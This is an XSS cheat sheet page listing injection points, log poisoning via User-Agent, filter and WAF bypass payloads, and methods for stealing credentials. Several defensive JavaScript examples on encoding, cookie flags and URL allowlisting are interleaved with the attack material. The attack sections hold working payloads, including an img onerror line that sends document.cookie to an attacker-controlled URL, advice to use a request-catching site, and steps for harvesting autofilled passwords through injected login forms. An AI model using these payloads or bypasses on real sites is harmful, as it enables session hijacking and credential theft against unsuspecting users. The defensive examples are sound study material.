Leet Sheet

XSS/Cross Site Scripting


Last updated 3 years ago


XSSable Locations

In the Document

XSS can occur as a result of the following:

  • The attacker can inject certain HTML tags.

    • The simplest example is the <script> tag, but others also work, such as <img src=x onerror=alert(1)>

  • The attacker can inject text between certain tags or into certain attributes.

    • The same as above, but instead of injecting the tag, the tag already exists and the attacker can write text inside it.

    • For example, there is an <img src=ATTACKER_INPUT_HERE> tag, and the attacker injects x onerror=alert(1)

  • The attacker can inject a malicious URL.

    • For example, <a href="javascript:alert(1)">click me</a>

Log Poisoning

You can try to sneak XSS payloads into logs. If the application that displays the logs renders entries without encoding them, the result is XSS in the log viewer.

If the User-Agent header is logged, putting the payload there is an easy way to get JavaScript into the log file.
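The defence for every location listed above is the same idea applied per context: encode the untrusted value for the exact place it lands in the document, and treat a log viewer as just another page that renders attacker-controlled strings. The following is an added example (not code from the Leet Sheet) that encodes text and attribute values and renders a constructed combined-format access-log line whose User-Agent carries the img payload from this page; the log line, the field names and the renderer are all assumptions made for the example.

```javascript
// Added example: context-aware output encoding for a log viewer.
// Assumption: log lines are in the common "combined" format, where the last
// two quoted fields are Referer and User-Agent.

// Text placed between tags: neutralise the five HTML metacharacters.
function escapeHtmlText(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Text placed inside an attribute: same table, but the caller MUST quote the
// attribute, otherwise `x onerror=alert(1)` breaks out without any metachar.
function escapeHtmlAttr(s) {
  return escapeHtmlText(s);
}

// Constructed sample log line; the User-Agent is the page's img payload.
const sampleLogLine =
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 512 ' +
  '"-" "<img src=x onerror=alert(1)>"';

// Split a combined-format line into fields; returns null if it does not match.
function parseLogLine(line) {
  const m = line.match(
    /^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/
  );
  if (!m) return null;
  return { ip: m[1], time: m[2], request: m[3], status: m[4],
           size: m[5], referer: m[6], userAgent: m[7] };
}

// Render one row of the viewer. Every field is attacker-influenced, so every
// field goes through the encoder for the context it is written into.
function renderLogRow(entry) {
  return `<tr title="${escapeHtmlAttr(entry.userAgent)}">` +
    `<td>${escapeHtmlText(entry.ip)}</td>` +
    `<td>${escapeHtmlText(entry.request)}</td>` +
    `<td>${escapeHtmlText(entry.userAgent)}</td></tr>`;
}

console.log(renderLogRow(parseLogLine(sampleLogLine)));
```

The rendered row still contains the literal payload text, which is what an analyst wants to see, but the browser never receives a `<` it can parse as a tag. Quoting the attribute is part of the contract: the encoder alone does not save an unquoted attribute.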

Payload Variations

Here are some common ones:

# Normal script tags
<script>alert(1)</script>

# HTML attributes, like img onerror
<iMg src=x onerror=prompt(1337);>

# XSS in between tags
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />     ← injecting ');alert('xss

# Iframe XSS, bypasses some sanitizers if the "srcdoc" attribute is allowed
<iframe srcdoc="&lt;img src=x:x onerror=alert(1)&gt;"></iframe>

Stealing Things

Catch and Store Stolen Credentials

Cookies

If cookies are accessible from JavaScript (no HttpOnly flag), then the payload can simply read document.cookie and send it in a GET request to a site you control:

<iMg src=x oNerRor=this.src='https://mysite.com/somepage?creds='+document.cookie>
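From the defender's side the question is whether the session cookie was ever reachable from script in the first place. Below is an added example (not from the Leet Sheet) that parses Set-Cookie headers and reports which cookies lack the attributes that limit the damage of the payload above; the three headers are constructed for the example and the finding texts are my own wording.

```javascript
// Added example: audit Set-Cookie headers for HttpOnly / Secure / SameSite.
// Constructed sample headers, e.g. captured from a response in a proxy.
const sampleSetCookieHeaders = [
  'session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'prefs=dark; Path=/',
  'token=xyz; Path=/; Secure',
];

// Split "name=value; Attr; Attr=value" into its parts. Flag attributes
// (HttpOnly, Secure) are collected in a Set; valued ones in an object.
function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(';').map(s => s.trim());
  const eq = nameValue.indexOf('=');
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq);
  const flags = new Set();
  const attributes = {};
  for (const attr of attrs) {
    if (attr === '') continue;
    const i = attr.indexOf('=');
    if (i === -1) flags.add(attr.toLowerCase());
    else attributes[attr.slice(0, i).toLowerCase()] = attr.slice(i + 1);
  }
  return { name, flags, attributes };
}

// One finding per missing protection. HttpOnly is the one that stops the
// document.cookie exfiltration shown above.
function auditCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.flags.has('httponly')) findings.push('missing HttpOnly: readable via document.cookie');
  if (!c.flags.has('secure')) findings.push('missing Secure: sent over plaintext HTTP');
  if (!('samesite' in c.attributes)) findings.push('missing SameSite: sent on cross-site requests');
  return { name: c.name, findings };
}

function auditAll(headers) {
  return headers.map(auditCookie);
}

for (const r of auditAll(sampleSetCookieHeaders)) {
  console.log(r.name, r.findings.length ? r.findings : 'ok');
}
```

HttpOnly stops the cookie from being read, not from being used: script running in the victim's origin can still make requests that carry it. It shrinks the blast radius of an XSS to the duration of the session rather than removing it.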

Passwords

TODO: Link phishing page under Social Engineering or Web App Hacking?

You can capture a user's password. For example:

  1. Display a login page to the user and capture the password if they choose to enter it.

  2. If the victim's browser has password saving enabled, put a login form on the page, wait about a second for the browser to autofill the saved password, and then capture it.

Filter Bypassing

Multiple Fields Method

Works for the (now removed) Chrome XSS Auditor and many other filters. The bypass relies on two query parameters that you can inject into: each injection on its own is not a valid payload, so the filter does not flag it, but once both are reflected into the page they combine into valid JavaScript.

For example, the first parameter:

<script>alert("hi

The second parameter:

");</script>

Global Variables

This works for weak (default) ModSecurity rulesets.

Simple example:

<script>self["alert"]("foo");</script>

Nested Payloads

If malicious input is stripped only once, then try nested payloads:

<scri<script>pt>alert(1)</scri</script>pt>
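The nested payload works against exactly the kind of sanitizer that removes a blacklisted string once and returns the rest. The added example below (not code from the Leet Sheet) runs the page's nested payload through a single-pass strip, then through a loop that strips until nothing changes, and then shows why even the looped version is still a blacklist; the function names and the page's own img payload used as the second input are the only assumptions.

```javascript
// Added example: why "strip the bad tag" is not a fix.
const nestedPayload = '<scri<script>pt>alert(1)</scri</script>pt>';

// Single pass: every literal <script> or </script> is removed once. The
// characters around each removal then join up into a fresh tag.
function stripScriptOnce(s) {
  return s.replace(/<\/?script>/gi, '');
}

// Repeat until a pass changes nothing, so re-formed tags are caught too.
function stripScriptUntilStable(s) {
  let prev;
  do {
    prev = s;
    s = stripScriptOnce(s);
  } while (s !== prev);
  return s;
}

// Would an HTML parser see the start of a tag anywhere in this string?
function containsTag(s) {
  return /<[a-z!\/]/i.test(s);
}

console.log('once   :', stripScriptOnce(nestedPayload));        // a working <script> tag
console.log('stable :', stripScriptUntilStable(nestedPayload)); // "alert(1)", inert
// The looped strip knows nothing about other handlers, so the page's img
// payload passes straight through it.
console.log('img    :', stripScriptUntilStable('<img src=x onerror=alert(1)>'));
```

Looping to a fixed point closes the nesting hole but only for the one string on the list; anything not on the list is untouched. Output encoding, or an allowlist-based HTML sanitizer, is the approach that does not depend on enumerating payloads.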

Various Payloads

Here are some more interesting payloads:

# Iframe XSS
<iframe srcdoc="&lt;img src=x:x onerror=alert(1)&gt;"></iframe>

# Against server-side parsers, this was an XSS in Google
<noscript><p title="</noscript><img src=x onerror=alert(1)>"> 

# CRLF injection to bypass javascript: being blacklisted
java%0d%0ascript%0d%0a:alert(0)

# In case svg onload= is filtered, the %0d acts as a separator and can sometimes confuse WAFs.
# %0a %0c %09 %00 are also common separators to use here.
<svg%0donload=prompt(1)>

# Uncommon XSS vector
<input onfocus=alert(0) autofocus>

# The use of \\ will break out of a quote inside a script tag
\\"-alert(0);//

# onmouseenter is like onmouseover, and confirm is like prompt
"onmouseenter=confirm(1)>
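The CRLF trick above works because a check for the literal string javascript: runs on a different view of the URL than the browser's parser, which removes tab, CR and LF from a URL before reading the scheme. The added example below (not code from the Leet Sheet) validates a user-supplied href by normalising first and then allowing only known-good schemes; it assumes the value is checked after the framework has URL-decoded it once (done here with decodeURIComponent), and the inputs are constructed for the example.

```javascript
// Added example: allowlist check for a user-supplied href.

// Decode once, then drop ASCII control characters and whitespace. Browsers
// remove tab/CR/LF themselves; removing the rest as well only makes the
// check stricter (more rejections), never looser.
function normaliseUrl(raw) {
  let s;
  try {
    s = decodeURIComponent(raw);
  } catch (e) {
    return null; // malformed %-escape: refuse rather than guess
  }
  return s.replace(/[\u0000-\u0020\u007f]/g, '');
}

// Accept relative paths and http(s) absolute URLs; reject every other scheme
// and protocol-relative URLs (which silently go off-site).
function isSafeHref(raw) {
  const s = normaliseUrl(raw);
  if (s === null) return false;
  const m = s.match(/^([a-z][a-z0-9+.-]*):/i);
  if (!m) return !s.startsWith('//');
  const scheme = m[1].toLowerCase();
  return scheme === 'http' || scheme === 'https';
}

// Constructed inputs: the page's CRLF payload, a plain javascript: URL,
// a safe absolute URL and a safe relative one.
const samples = [
  'java%0d%0ascript%0d%0a:alert(0)',
  'javascript:alert(1)',
  'https://example.com/page',
  '/local/path?x=1',
];
for (const u of samples) console.log(JSON.stringify(u), '->', isSafeHref(u));
```

Checking the scheme against an allowlist after normalisation, rather than searching for a forbidden substring before it, is what removes the whole family of separator variants listed above (%0a, %0c, %09, %00) at once.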

If you need a site for catching cookies, then https://requestcatcher.com/ should be useful.

More bypasses:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
https://www.youtube.com/watch?v=8GwVBpTgR2c
https://materials.rangeforce.com/tutorial/2019/10/23/ModSecurity-Filter-Evasion/
GitHub - s0md3v/AwesomeXSS: Awesome XSS stuff